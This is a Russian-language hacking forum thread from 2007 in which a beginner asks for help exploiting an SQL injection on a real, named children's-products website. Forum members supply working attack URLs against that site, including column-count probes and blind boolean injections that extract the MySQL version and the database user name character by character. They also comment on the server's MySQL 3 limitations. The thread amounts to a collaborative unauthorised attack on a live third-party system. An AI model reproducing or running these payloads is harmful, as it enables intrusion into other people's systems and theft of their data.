Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.03.2007, 07:50
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
странный SQL-injection
Вообщем так, нашёл на сайте вроде бы явную sql-injection
при вставке кавычки возвращает
http://www.injection.com/?dept=62&pid=665'
You have an error in your SQL syntax near '\'' at line 1
Вставляю
http://www.injection.com/?dept=62&pid=-999+union+select+1/*
А отображается
You have an error in your SQL syntax near 'union select 1/*' at line 1
При проверке
http://www.injection.com/?dept=62&pid=666-1
Выдаёт страницу http://www.injection.com/?dept=62&pid=665
Что бы я не вводил, выводится запрос в тексте после +union
Что такое - не получается
Я только учусь и надёюсь на ваш ценный совет!
Последний раз редактировалось fastnull; 22.03.2007 в 07:59..
|
|
|
22.03.2007, 08:09
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Полный линк на сайт в студию...
|
|
|
|
22.03.2007, 08:16
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Сообщение от ice1k
Полный линк на сайт в студию...
Пожалуйста! 
http://www.mykidsfair.com/?dept=62&pi=665
|
|
|
|
22.03.2007, 08:30
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
ну тогда правильный линк
http://www.mykidsfair.com/?dept=62&pi d=665
 |
|
|
|
22.03.2007, 08:31
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx
|
|
|
|
22.03.2007, 08:46
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Сообщение от aka PSIH
вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx
Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки
А что можно поиметь вот с этого сообщения
http://www.mykidsfair.com/?dept=-999+union+select+1,2/*
You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?
Последний раз редактировалось Koller; 22.03.2007 в 11:28..
|
|
|
|
22.03.2007, 09:28
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
http://www.mykidsfair.com/?dept=62+order+by+13--
на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version (),1,1)))=51
а потом вытягиваем USER()
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 1,1)))=99
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 2,1)))=106
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 3,1)))=104
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 4,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 5,1)))=114
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 6,1)))=109
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 7,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 8,1)))=110
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 9,1)))=64
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 10,1)))=108
в итоге получаем char() кодировку имени юзера
99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost)
ps мазахисты могут еще повытягивать......
|
|
|
|
22.03.2007, 10:44
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
А что можно поиметь вот с этого сообщения
http://www.mykidsfair.com/?dept=-999+union+select+1,2/*
You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?
в 3-м мускуле нету оператора union
|
|
|
|
22.03.2007, 15:27
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Спасибо огромное всем!!! Просто я хакинг начал изучать только в начале декабре 2006 |
|
|
|
22.03.2007, 23:36
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
а толку от этой скули?
можно узнать тока версию, юзера и название базы данных.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
